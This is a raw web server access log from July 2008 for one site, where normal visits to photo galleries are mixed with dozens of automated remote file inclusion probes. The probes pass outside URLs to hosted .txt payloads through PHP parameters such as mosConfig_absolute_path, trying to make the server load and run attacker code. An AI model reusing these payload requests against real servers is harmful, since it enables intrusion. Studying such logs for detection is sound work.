91.198.175.18 - - [14/Jul/2008:11:30:47 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:30:55 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7485.jpg HTTP/1.1" 200 174033 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:09 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7486.jpg HTTP/1.1" 200 139919 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:17 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7496.jpg HTTP/1.1" 200 132564 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:11:31:21 -0700] "GET /logs/access_080109.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:11:31:21 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:11:31:21 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:24 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7514.jpg HTTP/1.1" 200 144841 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:11:31:28 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:11:31:37 -0700] "GET //poll/poll_ssi.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:38 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7515.jpg HTTP/1.1" 200 127196 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:31:41 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:47 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7524.jpg HTTP/1.1" 200 169174 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:31:52 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7525.jpg HTTP/1.1" 200 144770 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:31:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:11:32:00 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=626 HTTP/1.1" 200 128 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:32:13 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:32:14 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:11:32:21 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:32:27 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:32:28 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7542.jpg HTTP/1.1" 200 135249 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:32:40 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:32:40 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:32:41 -0700] "GET /logs/scanhttp://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:32:42 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:32:44 -0700] "GET /scanhttp://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:32:45 -0700] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:32:47 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7542.jpg HTTP/1.1" 200 135249 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:32:50 -0700] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:32:51 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [14/Jul/2008:11:32:52 -0700] "GET /logs/access_080329.log/index.php?option=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:33:00 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7543.jpg HTTP/1.1" 200 153724 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:33:02 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:33:10 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.1" 200 8443 "http://www.st-owners.com/forums/showthread.php?p=399029" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:33:13 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:33:14 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:33:36 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7542.jpg HTTP/1.1" 200 135249 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
85.17.3.142 - - [14/Jul/2008:11:33:45 -0700] "GET /?mosConfig_absolute_path=http://princessonline.com.ar/files/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.3.142 - - [14/Jul/2008:11:34:15 -0700] "GET //index.php?option=http://princessonline.com.ar/files/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:34:18 -0700] "GET /logs/access_080118.log//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.198.175.18 - - [14/Jul/2008:11:34:21 -0700] "GET /logs/index.php?option=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:11:34:21 -0700] "GET /logs/access_080315.log/doceboLms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:34:22 -0700] "GET //modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:11:34:23 -0700] "GET /logs/doceboLms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.108.26.74 - - [14/Jul/2008:11:34:42 -0700] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH)" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:34:45 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.198.175.18 - - [14/Jul/2008:11:34:46 -0700] "GET /index.php?option=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:34:51 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:34:51 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7543.jpg HTTP/1.1" 200 153724 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:34:57 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:34:58 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:35:08 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7544.jpg HTTP/1.1" 200 136491 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:35:33 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7717.jpg HTTP/1.1" 200 127249 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:35:39 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7718.jpg HTTP/1.1" 200 160199 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:35:40 -0700] "GET /logs/access_071230.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:35:43 -0700] "GET /logs/access_071230.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:11:35:43 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:35:47 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7719.jpg HTTP/1.1" 200 131036 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:35:51 -0700] "GET /logs/index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:35:59 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7724.jpg HTTP/1.1" 200 165439 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
195.117.241.196 - - [14/Jul/2008:11:36:03 -0700] "GET /logs/access_080207.log//4nAlbum/?basepath=http://www.colegiomedsegpontevedra.com/robots.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:11:36:03 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:36:05 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7725.jpg HTTP/1.1" 200 152632 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:36:09 -0700] "GET /logs/access_080218.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:36:15 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:36:16 -0700] "GET /logs/access_080322.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:36:29 -0700] "GET //popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:36:31 -0700] "GET /logs/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:36:36 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:36:38 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:36:39 -0700] "GET /index2.php?url_page=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:36:43 -0700] "GET /logs/index.php?pageurl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:36:47 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:36:48 -0700] "GET /players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:36:54 -0700] "GET /logs/access_080128.log//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:37:04 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7729.jpg HTTP/1.1" 200 159394 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
87.106.101.71 - - [14/Jul/2008:11:37:07 -0700] "GET /errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:37:11 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:37:17 -0700] "GET /logs/index1.php?site=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:37:25 -0700] "GET /index1.php?site=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:37:34 -0700] "GET /index1.php?dat=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:37:35 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:11:37:42 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:37:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:37:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:38:03 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:38:03 -0700] "GET /logs/index2.php?url_page=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.130.134.140 - - [14/Jul/2008:11:38:03 -0700] "GET /logs//?mosConfig_absolute_path=http://www.firestormmedia.com/modules/test.txt? HTTP/1.0" 200 56125 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:38:04 -0700] "GET /logs/access.log/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:38:09 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:38:10 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.228.155.43 - - [14/Jul/2008:11:38:12 -0700] "GET //?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:38:15 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:38:15 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7734.jpg HTTP/1.1" 200 143201 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:11:38:22 -0700] "GET /logs/index1.php?dat=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.130.134.140 - - [14/Jul/2008:11:38:23 -0700] "GET //?mosConfig_absolute_path=http://www.firestormmedia.com/modules/test.txt? HTTP/1.0" 500 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:38:23 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:38:27 -0700] "GET /logs/access_080128.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:38:27 -0700] "GET /logs/access_080128.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:11:38:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.234.252.183 - - [14/Jul/2008:11:38:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:39:22 -0700] "GET /logs/access_080329.log/index2.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:39:22 -0700] "GET /logs/access_080329.log/index2.php?content=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:39:23 -0700] "GET /index2.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:39:27 -0700] "GET /index2.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:39:27 -0700] "GET /logs/index2.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:39:32 -0700] "GET /logs/index2.php?content=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
